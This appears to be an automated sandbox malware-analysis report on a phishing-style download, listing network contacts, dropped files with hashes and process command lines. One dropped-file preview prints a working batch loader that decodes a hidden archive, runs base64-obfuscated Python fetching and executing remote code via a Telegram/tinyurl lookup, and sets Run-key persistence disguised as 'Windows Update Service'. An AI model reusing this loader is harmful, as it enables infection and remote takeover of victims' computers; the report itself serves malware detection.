                                    http://blog.kowalczyk.info/software/sumatrapdf/translations.htmlContributeOzn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmpfalse
                                      high
                                      http://william.famille-blum.org/WilliamOzn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmpfalse
                                        high
                                        http://www.apache.org/licenses/LICENSE-2.0DigitizedOzn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmpfalse
                                          high
                                          http://mupdf.comMuPDFpdfOzn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmpfalse
                                            high
                                            http://www.winimage.com/zLibDllbadOzn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmpfalse
                                              high
                                              http://www.winimage.com/zLibDllOzn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmpfalse
                                                high
                                                http://cn.haihaisoft.com/%E6%B5%B7%E6%B5%B7%E8%BD%AF%E4%BB%B6PDF%E9%98%85%E8%AF%BB%E5%99%A8.aspxopenOzn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmpfalse
                                                  high
                                                  http://www.haihaisoft.com/Contact.aspx%u%?.Install_DirSoftwareOzn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmpfalse
                                                    high
                                                    http://cn.haihaisoft.comhttp://www.haihaisoft.comcnhttp://cn.haihaisoft.com/%E6%B5%B7%E6%B5%B7%E8%BDOzn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmpfalse
                                                      high
                                                      http://blog.kowalczyk.infoKrzysztofOzn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmpfalse
                                                        high
                                                        http://www.haihaisoft.comSumatraPDFOzn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmpfalse
                                                          high
                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs
                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          1.1.1.1
                                                          unknownAustralia
                                                          13335CLOUDFLARENETUSfalse
                                                          142.250.65.227
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          162.125.13.15
                                                          unknownUnited States
                                                          19679DROPBOXUSfalse
                                                          142.251.40.174
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          104.18.111.161
                                                          unknownUnited States
                                                          13335CLOUDFLARENETUSfalse
                                                          162.125.13.18
                                                          unknownUnited States
                                                          19679DROPBOXUSfalse
                                                          142.251.35.164
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          142.250.176.195
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          172.253.122.84
                                                          unknownUnited States
                                                          15169GOOGLEUSfalse
                                                          IP
                                                          192.168.2.6
                                                          Joe Sandbox version:42.0.0 Malachite
                                                          Analysis ID:1649464
                                                          Start date and time:2025-03-26 19:48:25 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 5m 25s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:browseurl.jbs
                                                          Sample URL:https://tinyurl.com/yep5ph9f
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:24
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Detection:MAL
                                                          Classification:mal52.evad.win@38/11@0/10
                                                          EGA Information:
                                                          • Successful, ratio: 100%
                                                          HCA Information:
                                                          • Successful, ratio: 100%
                                                          • Number of executed functions: 95
                                                          • Number of non-executed functions: 53
                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, ShellExperienceHost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size getting too big, too many NtCreateFile calls found.
                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Skipping network analysis since amount of network traffic is too extensive
                                                          • VT rate limit hit for: https://tinyurl.com/yep5ph9f
                                                          No simulations
                                                          No context
                                                          No context
                                                          No context
                                                          No context
                                                          No context
                                                          Process:C:\Windows\SysWOW64\7za.exe
                                                          File Type:PEM certificate
                                                          Category:dropped
                                                          Size (bytes):21693134
                                                          Entropy (8bit):6.044410053618675
                                                          Encrypted:false
                                                          SSDEEP:49152:ZNBdUuKNx2GNgOrbZpmco2rc2M2TfwANfTBPb1xCGQTOrPOUuxQqiy8uGLj9tY4z:G
                                                          MD5:FDEA631DCD5649014781E4975F0DF4BE
                                                          SHA1:C9A5740C9EFB7FD5D0D594C16056EF2521C164A2
                                                          SHA-256:D04FF4ABB797FF8D4FFA4FFCEE283F005DD8054EC6A6C105327C251B5F894777
                                                          SHA-512:E9ACE6E1BACFF50A4D37D44EB8CC49E94EE4CFE8F23EF02DF8142B1F4D5F2452C5C21E54AD15311B53FEC709C93C4274332DAC6C59CD4C5D1356EE3D00B3017A
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:-----BEGIN CERTIFICATE-----..UmFyIRoHAQCvjitTIQQAAAEPmcj87XKxzfFcg315FEpL91ZawmsA7e8UJ309FtYy..FnzHaA57mY3GD2gCE1rFZ6pObU0Vc+pCH7LThfmWq66/r4y9UybrDqBzv37chI38..XAJYxOYl9XRgCv+aYjs/GAITxlriFpFhThsJVThKnCvte+5VGYzW8xGSX80dupJ7..UugXjUMwihmV7Uq7tzaf3OgceoVf1VGIWbWh+thjWvKY8ZHN1jMtLpw/LljI7BoA..r1qYUosETA7+fXTIE4psKGQnsrZ6RPw6ez3CTAhve17DsC7NWV9ChSRagTjee4zL..CCA+ijOpFIqFUNfrnDsIxZplWZ2/i46twyYNc02JU1/1EYwvnYZNIRhEp/GsIevL..nRBKPcnudLGIhm+HdADz+1+61sRUj7F3SBVSL7bgCyaBfojq1mU1a8qMohErGgPu..Eqt27iz5q4Q6t/8Af8dzS1lp9a/7Y+LGDWvMWDUJJQKjtasEDPPz6+M5y/1scqgQ..e9xqxJBZs8zkm2MKhl90gkx9zUwE+6fNUUHtQ2SPpzoPOHgr15IFzmOwGGYYgP2E..MgSU4KbYjgtsRl7401psCZXcYqdgWpeSDSrRhyJgDkspjLO5vVnhYlAUOid9Eazu..KMKFBvX+UsDvCZl3yCx4bhEbCRGJLSBAWPibuhO5/EkhUq1gp3n87UOj0M9ZFc5v..4Zq4dfVwiwhorzyo8dgP1inMdDdMRZkb1gA2dIUqGFD0I1FjHtG1oBxQvC4wDa6I..mGHpMmCvuKZTC4dpNp2iDUIGZh6JusHfMjrFE+q2zswlMgYv0Crdbo/WnUtDu/5z..LiUkKAjeppwHQtfNtcwm4zbi4AFjMbhJThPbz2+yxdeqcMNNW1QHv4XOA8vDgegh..Aggv1O8dsQ5pjva3raWDSbJKKTYNqUBis1o/S4crFKfXFcu
                                                          Process:C:\Windows\SysWOW64\7za.exe
                                                          File Type:ASCII text, with very long lines (465), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1128
                                                          Entropy (8bit):5.917020059198988
                                                          Encrypted:false
                                                          SSDEEP:24:3siHZmW0zQOrmDr9VaetCq4BmmWCAAmWpVgIrEmWS08u:x5mW0zQOrmtVIZmmW1AmWpyMEmWXN
                                                          MD5:45FC438AA47555C27661972BBCEFB3C0
                                                          SHA1:850F150DDEBE23679BA8EC7A3332D0C085EC02ED
                                                          SHA-256:4353E0B55D4698F2A6EDDC2A8EC53B22548EF47F5010732163DFB241FB97414F
                                                          SHA-512:2E4058EB777FA8ADCEC60F1B2345CC52A5D7B90BB9F6C8CA6AA4ABC2F789E06E2C034DED6C1691A34BA5822C2B4E4729D93B89C46BC0B886A824979FCDE1951A
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:cd /d "%~dp0"..start /max "" "Documents.pdf"..certutil -decode Documents.pdf LX8bzeZTzF5XSONpDC.rar..mkdir C:\Users\Public\LX8bzeZTzF5XSONpDC..images.png x -pS8SKXaOudHX78CnCmjawuXJAXwNAzVeK -inul -y LX8bzeZTzF5XSONpDC.rar C:\Users\Public\LX8bzeZTzF5XSONpDC..echo ___________ = 'https://t.me/MEXX6toHNBot'; exec(__import__('base64').b64decode('aW1wb3J0IHJlcXVlc3RzLCByZTsgZXhlYyhyZXF1ZXN0cy5nZXQocmVxdWVzdHMuaGVhZChmJ2h0dHBzOi8vdGlueXVybC5jb20ve21hdGNoLmdyb3VwKDEpfScsIGFsbG93X3JlZGlyZWN0cz1UcnVlKS51cmwpLnRleHQpIGlmIChtYXRjaCA6PSByZS5zZWFyY2gocic8bWV0YSBwcm9wZXJ0eT0ib2c6ZGVzY3JpcHRpb24iIGNvbnRlbnQ9IihbXiJdKykiJywgcmVxdWVzdHMuZ2V0KF9fX19fX19fX19fKS50ZXh0KSkgZWxzZSBOb25lCg==')) >> C:\Users\Public\LX8bzeZTzF5XSONpDC\Photos..start "" /min "C:\Users\Public\LX8bzeZTzF5XSONpDC\svchost.exe" C:\Users\Public\LX8bzeZTzF5XSONpDC\Photos..reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Update Service" /t REG_SZ /d "cmd.exe /c start \"\" /min \"C:\Users\Public\LX8bzeZTzF5XSONpDC\s
                                                          Process:C:\Windows\SysWOW64\7za.exe
                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):644184
                                                          Entropy (8bit):6.451035547006443
                                                          Encrypted:false
                                                          SSDEEP:12288:XxGICLbJbw9eVSeeUpG8dux9VF7qDtJQcBswj1POW4ddjh:mdbmeVSowh3VdqD/owpPODdjh
                                                          MD5:01F28B85ABF1993B7B14B3D15346F2E8
                                                          SHA1:DEC708FE5E44E77E1737C51B7A4A0422994D1F6F
                                                          SHA-256:B550465B9739594B6A193A16FA33F3CDDE3ECD4773FEB93E68C00FDBCF5EB8B8
                                                          SHA-512:DEA58D71EC8A0BF3BCBAA78CF54C957FA218F1842FE3FCB9C40D05B0C1E9A8DBF1D486036AD0EB04741E15149F93AFEC1B4878A0CD6B6A2B92FB9D00363AA14A
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:low
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............|...|...|..Q....|..Q...f|..Q....|....b..|..e....|..e....|..e....|..e....|....v..|...|..^|..k...|..k....|..k....|..Rich.|..................PE..d.....td.........."....!. ...*.................@....................................d.....`.................................................4w..........H........F......XH......x.......T.......................(.......@............0...............................text............ .................. ..`.rdata..@Z...0...\...$..............@..@.data...l........4..................@....pdata...F.......H..................@..@_RDATA..\...........................@..@.rsrc...H...........................@..@.reloc..x...........................@..B........................................................................................................................................................................................
                                                          Process:C:\Windows\SysWOW64\7za.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):6365288
                                                          Entropy (8bit):6.974813635942095
                                                          Encrypted:false
                                                          SSDEEP:98304:VZQIM+/nv/CDoAkYwpAa5ge1zZ/jtdZwUkQ:bJCKlA2VKUz
                                                          MD5:4864A55CFF27F686023456A22371E790
                                                          SHA1:6ED30C0371FE167D38411BFA6D720FCDCACC4F4C
                                                          SHA-256:08C7FB6067ACC8AC207D28AB616C9EA5BC0D394956455D6A3EECB73F8010F7A2
                                                          SHA-512:4BD3A16435CCA6CE7A7AA829EB967619A8B7C02598474E634442CFFC55935870D54D844A04496BF9C7E8C29C40FAE59AC6EB39C8550C091D06A28211491D0BFB
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                          Reputation:low
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........N..HN..HN..Hih.H\..HP.BHF..H..PHF..HG.SHu..HG.BH...HN..HQ..HG.EH...Hih.Hk..HN..H%..HG.OHw..HP.RHO..HG.WHO..HRichN..H........................PE..L...$7.Z.................z,...4...............,...@...........................b......a......................................W.|....._...............a.h...........@.,.............................H.U.@.............,.....\.W.@....................text...\y,......z,................. ..`.rdata...]+...,..^+..~,.............@..@.data...\.....W..<....W.............@....rsrc........._.......^.............@..@................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\SysWOW64\7za.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):91272
                                                          Entropy (8bit):6.949159838323346
                                                          Encrypted:false
                                                          SSDEEP:1536:fDrhkJFRuE16nq2QoVj8gMaPTz7WHqQWZwg+AnecbGKjj9M9zfk/AJYpz7w:LdkpQMaPDWgD+wecbGkjk4vpnw
                                                          MD5:4F0F5649FFC133FA626589ED6111C30E
                                                          SHA1:65ACBA59815E6440C06C55C4457C601B5B22B0AD
                                                          SHA-256:A088131E8EB4E2178789AF49B646AB463CF9A1F48DA51698448206DF21DB5C95
                                                          SHA-512:526432F06A9105F29FD8E9C1814B5CA82880337A2DE0149ED9A15E250DA607047331C299FFFB41CB7486A4D61C543F459BF073E1187637FDED487019B5B0A04E
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:low
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........tm<[..o[..o[..o.m.nY..oRm.oP..o[..or..o...nM..o...nG..o...nH..o...nZ..o...oZ..o...nZ..oRich[..o........................PE..L....B............"!...(.....................................................P............@A................................. .......0...................P...@.. ....$..T............................#..@............ ...............................text............................... ..`.data...\...........................@....idata....... ......................@..@.rsrc........0......................@..@.reloc.. ....@......................@..B................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\SysWOW64\7za.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):106966016
                                                          Entropy (8bit):7.999998173226792
                                                          Encrypted:true
                                                          SSDEEP:
                                                          MD5:8CDF9A374B8451764C5747CDB5078987
                                                          SHA1:5A49164750E327CC82B4B72EBADC9D8A46B10920
                                                          SHA-256:282C1A5D33E30FB6C8A9EFE78BE833786376CF8F8BFD04D8047B96FF67914B59
                                                          SHA-512:ED825FDE2745F76605D4A63CF11D7B9D23CC455589CD7624FD60938D44D8C81F8C49CFE2827516205157741198D3C205F216848E1F8E76D93BDD66D3F153A15E
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:low
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........%w._D.._D.._D..V<..[D..O...]D..O...^D..O...UD..O...UD...<..\D.._D..vD......]D......^D......^D.._D..^D......^D..Rich_D..........................PE..L...\..g...........!...).....................0...............................p............@..........................6.......6..d....P..P....................`......p2..8............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...$....@......."..............@....rsrc...P....P.......$..............@..@.reloc.......`.......*..............@..B........................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\SysWOW64\unarchiver.exe
                                                          File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                          Category:modified
                                                          Size (bytes):3648
                                                          Entropy (8bit):5.344786537054487
                                                          Encrypted:false
                                                          SSDEEP:48:w+9suGfGbfGfGpJGoGfGpyjVMGbVGljVMGHG2GfGGGfGpGsG/Gfcb2pwrio5o7xl:wtXVbqV+MGUoNJWvY
                                                          MD5:B5185650DF89AF448D2C54CB5CB5ECCB
                                                          SHA1:52DAFDCE1B833CDEC90884114FD2021B7FF3602E
                                                          SHA-256:78A53FA7065BFA9BAED668CD737108246B724DDAB904CCC23BF315AE4268A897
                                                          SHA-512:6BE2809F936F892144D7B3DA1033F2E441A7FE79BEC1B012CE2F4032CE0FA97386A50E9B09C384C3ACA1A91DC0E1EA2A2950A6465A718DDD4D47393C154A1F43
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:03/26/2025 2:50 PM: Unpack: C:\Users\user\Downloads\Ozn.men._o_zji.t.n._poru.en._pr.v_du.evn.ho_vlastnictv._.zip..03/26/2025 2:50 PM: Tmp dir: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka..03/26/2025 2:50 PM: Received from standard out: ..03/26/2025 2:50 PM: Received from standard out: 7-Zip 18.05 (x86) : Copyright (c) 1999-2018 Igor Pavlov : 2018-04-30..03/26/2025 2:50 PM: Received from standard out: ..03/26/2025 2:50 PM: Received from standard out: Scanning the drive for archives:..03/26/2025 2:50 PM: Received from standard out: 1 file, 126856514 bytes (121 MiB)..03/26/2025 2:50 PM: Received from standard out: ..03/26/2025 2:50 PM: Received from standard out: Extracting archive: C:\Users\user\Downloads\Ozn.men._o_zjisten._porusen._pr.v_dusevn.ho_vlastnictv._.zip..03/26/2025 2:50 PM: Received from standard out: --..03/26/2025 2:50 PM: Received from standard out: Path = C:\Users\user\Downloads\Ozn.men._o_zjisten._porusen._pr.v_dusevn.ho_vlastnic
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                          Category:dropped
                                                          Size (bytes):15489
                                                          Entropy (8bit):7.9726544836440345
                                                          Encrypted:false
                                                          SSDEEP:384:O+lnDvM09xdTymK4nn2+1mpgMiI4SoirYH:OonTM09TyEhIgM6i0H
                                                          MD5:0321878504CAB5B182F327DD096A7299
                                                          SHA1:E48CBC5E2E67818E811ECF23B6924593C02387BE
                                                          SHA-256:D073C8820C996C8DF0F652FF0BF9FCC194D095E9BA6E7F5FF67E0C4A952C0A98
                                                          SHA-512:615E85238AC59CE20223C257FB611CCE3E857F85324F19BC6CE200AB6652E1E26AB404A6EFA67CF64C58C29468895B9426F2E88D839B4828423F1EC0E6D36ED7
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_ZipBomb, Description: Yara detected ZipBomb, Source: C:\Users\user\Downloads\68c8e194-372f-4d65-ab89-d63f8d42e0ea.tmp, Author: Joe Security
                                                          Reputation:low
                                                          Preview:PK..........sW.}gBW`..,`.....version.dll..eX]M. .o..............\C...[p........={..~.}.o.|..8.5.Tw.tuuUw.^..........@xy..Z...0..wA........p.$-`..$..6n..NV.&..f&..N.......6...Jj..N...HH........0....4.c....R7...k.;g....i....-&?......yO...*...*..7o..O.....Um.A....,...A.......m..I...i..@........@`...>8.......8...W.0.. T...........-.......(...c...........K-...!....<....;..A.. ....w!....jn.n......vD ..W..y......!..@.....\7......*..8..F...........G..r...S..J..8....?.F.I..]....-..........`..X.!_._.....#/.....(.=.?..e..h|.px,,PC.....V..X.p|..*8...~...e.......$p....56.......{........(........l.J0.+|i*..Q~Y...........0E ..w#...P.b.w...l...`...._p.....?.$.x>B...P....P....#w..n.W._.PA...D.Z.8.._..|~]..;.H@....l...:.....)...[....3.?..)....#7...)........?dk..e`k..M..Z.JX.p..................m...'......2...~.G...A'...2Z.\8..\.(..$........8X..S.c....`!...wr.?=...........:=V.1.....z..N...@..[..1.....c..6`...}L..1a....t.QC.Q.(..@..."P..H.-.u...........`z....b.8....(Jb..
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                          Category:dropped
                                                          Size (bytes):126856514
                                                          Entropy (8bit):7.999887962197239
                                                          Encrypted:true
                                                          SSDEEP:
                                                          MD5:7C69DB1F867B4D25B181E0970381EAF2
                                                          SHA1:CDA2E3CA67D905B070932EA99E57D9BC49BEC812
                                                          SHA-256:D988FF4175D459F6960C8FA05DBEBF9277B63AD744860B4C3A54A81B7C90FA21
                                                          SHA-512:234528EA595FE35C2D9AD203EDE49C335D7184AC330ED25993039F75C7E0F2B8152FAEC745754A253C26AF17ACCCDFE413B401492B9878426F623942B440B5C1
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:PK..........sW.}gBW`..,`.....version.dll..eX]M. .o..............\C...[p........={..~.}.o.|..8.5.Tw.tuuUw.^..........@xy..Z...0..wA........p.$-`..$..6n..NV.&..f&..N.......6...Jj..N...HH........0....4.c....R7...k.;g....i....-&?......yO...*...*..7o..O.....Um.A....,...A.......m..I...i..@........@`...>8.......8...W.0.. T...........-.......(...c...........K-...!....<....;..A.. ....w!....jn.n......vD ..W..y......!..@.....\7......*..8..F...........G..r...S..J..8....?.F.I..]....-..........`..X.!_._.....#/.....(.=.?..e..h|.px,,PC.....V..X.p|..*8...~...e.......$p....56.......{........(........l.J0.+|i*..Q~Y...........0E ..w#...P.b.w...l...`...._p.....?.$.x>B...P....P....#w..n.W._.PA...D.Z.8.._..|~]..;.H@....l...:.....)...[....3.?..)....#7...)........?dk..e`k..M..Z.JX.p..................m...'......2...~.G...A'...2Z.\8..\.(..$........8X..S.c....`!...wr.?=...........:=V.1.....z..N...@..[..1.....c..6`...}L..1a....t.QC.Q.(..@..."P..H.-.u...........`z....b.8....(Jb..
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                          Category:dropped
                                                          Size (bytes):126856514
                                                          Entropy (8bit):7.999887962197239
                                                          Encrypted:true
                                                          SSDEEP:
                                                          MD5:7C69DB1F867B4D25B181E0970381EAF2
                                                          SHA1:CDA2E3CA67D905B070932EA99E57D9BC49BEC812
                                                          SHA-256:D988FF4175D459F6960C8FA05DBEBF9277B63AD744860B4C3A54A81B7C90FA21
                                                          SHA-512:234528EA595FE35C2D9AD203EDE49C335D7184AC330ED25993039F75C7E0F2B8152FAEC745754A253C26AF17ACCCDFE413B401492B9878426F623942B440B5C1
                                                          Malicious:true
                                                          Reputation:low
                                                          Preview:PK..........sW.}gBW`..,`.....version.dll..eX]M. .o..............\C...[p........={..~.}.o.|..8.5.Tw.tuuUw.^..........@xy..Z...0..wA........p.$-`..$..6n..NV.&..f&..N.......6...Jj..N...HH........0....4.c....R7...k.;g....i....-&?......yO...*...*..7o..O.....Um.A....,...A.......m..I...i..@........@`...>8.......8...W.0.. T...........-.......(...c...........K-...!....<....;..A.. ....w!....jn.n......vD ..W..y......!..@.....\7......*..8..F...........G..r...S..J..8....?.F.I..]....-..........`..X.!_._.....#/.....(.=.?..e..h|.px,,PC.....V..X.p|..*8...~...e.......$p....56.......{........(........l.J0.+|i*..Q~Y...........0E ..w#...P.b.w...l...`...._p.....?.$.x>B...P....P....#w..n.W._.PA...D.Z.8.._..|~]..;.H@....l...:.....)...[....3.?..)....#7...)........?dk..e`k..M..Z.JX.p..................m...'......2...~.G...A'...2Z.\8..\.(..$........8X..S.c....`!...wr.?=...........:=V.1.....z..N...@..[..1.....c..6`...}L..1a....t.QC.Q.(..@..."P..H.-.u...........`z....b.8....(Jb..
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                          Category:dropped
                                                          Size (bytes):15489
                                                          Entropy (8bit):7.9726544836440345
                                                          Encrypted:false
                                                          SSDEEP:384:O+lnDvM09xdTymK4nn2+1mpgMiI4SoirYH:OonTM09TyEhIgM6i0H
                                                          MD5:0321878504CAB5B182F327DD096A7299
                                                          SHA1:E48CBC5E2E67818E811ECF23B6924593C02387BE
                                                          SHA-256:D073C8820C996C8DF0F652FF0BF9FCC194D095E9BA6E7F5FF67E0C4A952C0A98
                                                          SHA-512:615E85238AC59CE20223C257FB611CCE3E857F85324F19BC6CE200AB6652E1E26AB404A6EFA67CF64C58C29468895B9426F2E88D839B4828423F1EC0E6D36ED7
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:PK..........sW.}gBW`..,`.....version.dll..eX]M. .o..............\C...[p........={..~.}.o.|..8.5.Tw.tuuUw.^..........@xy..Z...0..wA........p.$-`..$..6n..NV.&..f&..N.......6...Jj..N...HH........0....4.c....R7...k.;g....i....-&?......yO...*...*..7o..O.....Um.A....,...A.......m..I...i..@........@`...>8.......8...W.0.. T...........-.......(...c...........K-...!....<....;..A.. ....w!....jn.n......vD ..W..y......!..@.....\7......*..8..F...........G..r...S..J..8....?.F.I..]....-..........`..X.!_._.....#/.....(.=.?..e..h|.px,,PC.....V..X.p|..*8...~...e.......$p....56.......{........(........l.J0.+|i*..Q~Y...........0E ..w#...P.b.w...l...`...._p.....?.$.x>B...P....P....#w..n.W._.PA...D.Z.8.._..|~]..;.H@....l...:.....)...[....3.?..)....#7...)........?dk..e`k..M..Z.JX.p..................m...'......2...~.G...A'...2Z.\8..\.(..$........8X..S.c....`!...wr.?=...........:=V.1.....z..N...@..[..1.....c..6`...}L..1a....t.QC.Q.(..@..."P..H.-.u...........`z....b.8....(Jb..
                                                          No static file info
                                                          Icon Hash:00b29a8e86828200
                                                          Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.
                                                          Target ID:1
                                                          Start time:14:49:22
                                                          Start date:26/03/2025
                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                          Imagebase:0x7ff63b000000
                                                          File size:3'388'000 bytes
                                                          MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:false

                                                          Target ID:4
                                                          Start time:14:49:27
                                                          Start date:26/03/2025
                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2060,i,2845414822576318589,8729507620722358709,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2088 /prefetch:3
                                                          Imagebase:0x7ff63b000000
                                                          File size:3'388'000 bytes
                                                          MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:false

                                                          Target ID:11
                                                          Start time:14:49:33
                                                          Start date:26/03/2025
                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://tinyurl.com/yep5ph9f"
                                                          Imagebase:0x7ff63b000000
                                                          File size:3'388'000 bytes
                                                          MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true
                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

